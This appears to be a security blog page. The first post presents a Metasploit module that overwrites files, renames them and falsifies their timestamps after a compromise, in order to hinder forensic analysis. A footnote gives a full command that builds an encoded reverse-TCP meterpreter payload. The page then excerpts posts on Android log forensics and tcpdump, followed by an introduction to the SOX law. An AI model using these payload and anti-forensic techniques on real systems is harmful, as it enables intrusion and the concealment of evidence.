Safe Delete Meterpreter Module

It has recently been added to Metasploit (master branch) a module that can be interesting to delete files downloaded in a victim computer thru a meterpreter session.

This module, sdel, overwrites the file we want the number of times we choose, with random characters or null bytes (like the shred Linux command). Moreover, before deleting the file, it overwrites its name with a long string (200 bytes) and modifies its MACE attributes (access date, modification, creation and entry in the Master File Table (MFT)) making use of the API priv.fs.set_file_mace, as it is shown in its code.

As shown in the image, the new generated dates will correspond to the current date minus N random days .

Code of the change_mace function
It is worth to mention that in NTFS systems if the user wants to delete very small files, they could remain in the MFT stream descriptor and thus they would not be overwritten. The module sdel would alert the user, warning that the file to be deleted is less than 800 bytes. Sdel, therefore, overwrites the file content and the slack space (—lost— space left between the end of the file and the cluster used), but it won’t do a wipe of the free space. It is important to take this into account because files that use the encryption/compression of Windows, as well as temporal files, may remain scattered around the disk without being overwritten.

As its description shows, this module can be very useful when, for instance, in the phase of post exploitation of a victim computer the user needs to download an executable file to perform some action and after that to delete its contents safely, in order to make it difficult for a potential subsequent forensic analysis.

The use of sdel is simple. To overwrite and delete the desired file, the user only has to specify the number of overwriting iterations that must be performed and the type of overwriting (random or null bytes). These are the choices of the module:

Module options
Now suppose the following scenario. We have a meterpreter session [1] on a victim machine in which we used the tool mimikatz (tool to dump plaintext passwords from a Windows or obtaining hashes from SAM, among other features) and we want to delete after using it. We execute sdel setting three passes of file overwriting:

If after deleting a file with sdel we check its contents [2] on disk before and after the deletion, we can see that it has been overwritten properly. The following screenshots show the result before and after deleting a test file (msf.txt) on an NTFS filesystem.

File content on disk BEFORE being deleted by sdel

File content on disk AFTER being deleted by sdel

MFT content BEFORE deleting the file by sdel

MFT content AFTER deleting the file by sdel
As seen in previous images both the name and the contents MTF have been overwritten.

The module has been developed by Borja Merino (@borjamerino), regular author of this blog, and you can use it as far as you are using the last version of Metasploit.

[1] The tests have been performed with a VM with Windows 7 (X.X.X.51) and Backtrack 5 r3 (X.X.X.41) used to generate a executable file (meterpreter.exe) with payload windows/meterpreter/reverse_tcp coded with the algorithm shikata_ga_nai:

msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.41 R | ./msfencode -e x86/shikata_ga_nai 
-c 10 -t exe -o meterpreter.exe

Executing the meterpreter.exe file in the victim machine and using Metasploit we obtain our reverse shell to connect to the victim computer:

Meterpreter session obtained
[2] The tool used has been WinHex.

Android Log Forensics

The introduction of the Android operating system in mobile devices is growing at a overwhelming speed. Latest data point shows that 1.3 million Android devices are activated every day (Spanish). If Android maintains this pace, in just 4 years there will be more Google systems in operation than Windows systems. Therefore, the study of the security of Android is necessary and in security, an interesting and important area is the forensic study.

A forensic analyst must be able to extract the maximum available information from the device. Depending on the purpose of the research, s/he will focus on extracting different types of data. For example, a researcher who analyzes a possible malware-infected smartphone need processes in memory, active connections, the inbound and outbound traffic, while in the analysis of a mobile phone whose owner is suspected of a crime, it will look for data that could help the investigation to provide evidence, such as calls, emails, GPS position, photos, chat history, etc.

There area several methods to extract information from an android device: RAM memory dump, NAND memory image, external memory SD-card data and hot extraction data. Today’s post focuses on recovering data by using the Android system’s own commands, and more specifically, the logs generated by the system.

[Read more…]

TCPdump DROP privileges

I’m sure many of you know tcpdump and use it frequently. As we all know when it is run without privileges to capture packets on a network interface it displays the following message:

$ /usr/sbin/tcpdump -i eth0
tcpdump: eth0: You don't have permission to capture on that device
(socket: Operation not permitted)

[Read more…]

SOX. A brief introduction.

I do not know how deep is your memory, but the reader will probably remember the name of Enron, an energy company that became world famous thanks to an accounting fraud scandal that implicated George W. Bush in late 2001, and affected seriously the known auditing firm Arthur Andersen. Perhaps Worldcom name is also familiar, company that filed for bankruptcy and holds the dubious title of being today the largest bankruptcy case in U.S. history (excuse my lack of technical financial and/or legal vocabulary); Enron is second on the podium. Beyond these two famous cases, you may be not know that Tyco and Xerox were also involved in similar scandals, and that there are many more.

Without going into any further details, the common element in all these cases was the use of “accounting techniques” that concealed and mask financial problems, which came to be billions of dollars, showing a great lack of transparency in corporate governance and accounting and financial situation. Please notice that I have not said “lack of control”, because given the characteristics of these multimillion dollar frauds, in which major corporate managers were involved, we can not say that there were no internal control (although there was no external control) in the way thos fraudulent activities were carried. In response to this type of fraud, was created the U.S. law commonly known as SOX, whose full name is the Sarbanes-Oxley Act of 2002.

This law was designed with the purpose of increasing the financial transparency of companies listed on the U.S. stock market, thereby protecting investors and shareholders demanding reliability, responsibility and accuracy of financial data. In some way, we could say that SOX is, regarding accounting and financial data, what the Spanish Data Protection Act is in regard to personal data. The way that SOX has to implement these objectives is by establishing controls to prevent and deter the illicit financial activities, as well as introducing fines of up to $ 5M and imprisonment of up to 20 years for those managers whose companies fail to comply with SOX requirements. At this moment, this is one of the most comprehensive and strict laws —perhaps in some ways too much— in the prevention of financial crime, establishing a set of behaviors strongly punished such as alteration of financial reports, threats against potential informers of irregular activities (whistleblowers), or deceive and mislead the Auditors.

It should be noted that, in order to protect shareholders and investors, its scope is not limited to those corporations located in the US, but to any company, American or not, that directly or indirectly has a presence on the American Stock Exchange; this means therefore that a multinational corporation formed by different business units, in which only one of them is listed on the American Stock Exchange, must comply with SOX in all of them. This will prevent that a financial fraud at a subsidiary or parent company impacts on the accounts of the company which is traded on the American Stock Exchange and that is financially “clean” for all purposes.

Although as stated above the law clearly establishes the punishable and irregular behaviors and generally conveys the idea of transparency and responsibility to corporate governance, it does not get into into the specific details of the controls to implement to comply with SOX, leaving the decision and definition of controls to the companies. This brings as a main advantage the freedom and flexibility that gives to the company itself in the type, quality and quantity of controls. However, on the other hand this lack of definition and absence of concretion is one of main sources of confusion about what should be considered appropriate as a SOX control. The areas where SOX has an increased incidence are, according to the COSO (Committee of Sponsoring Organizations of the Treadway Commission) methodology for compliance: Risk assessment, Control of the working environment, Control of activities, Monitoring, and Information and communication.

In addition to the US law, there are laws with a similar purpose in other countries, well based on SOX, or independently; some examples are CSOX (Canada), CLERP9 (Australia), J-SOX (Japan) or LSF (France), and there is currently a project of European SOX called euroSOX. Although SOX is mandatory only for organizations that are traded on the American Stock Exchange, it must be considered as a reference standard for good governance.

However, we need to say that SOX is not, as well as any other regulation, a panacea; it does not put a gun in the neck of each broker, accountant or financial, nor a camera on top of each person. It is not able to foresee or avoid complex financial frauds which are developed by very knowledgeable people in the environment in which they move; another example is the recent case of Jérôme Kervial in Société Genéralé broker, although that is something to be analyzed in a separate entry.

To end with this introduction, what this frauds reveal is that, apart from regulations or exogenous constraints, it is essential that such controls and mechanisms are endogenous, arising from the company itself, aware of the risks external and internal that it is facing. The controls that laws such as SOX introduces into the organizations should not be something that “emanates” from alien organisms but security measures that companies should undertake by themselves.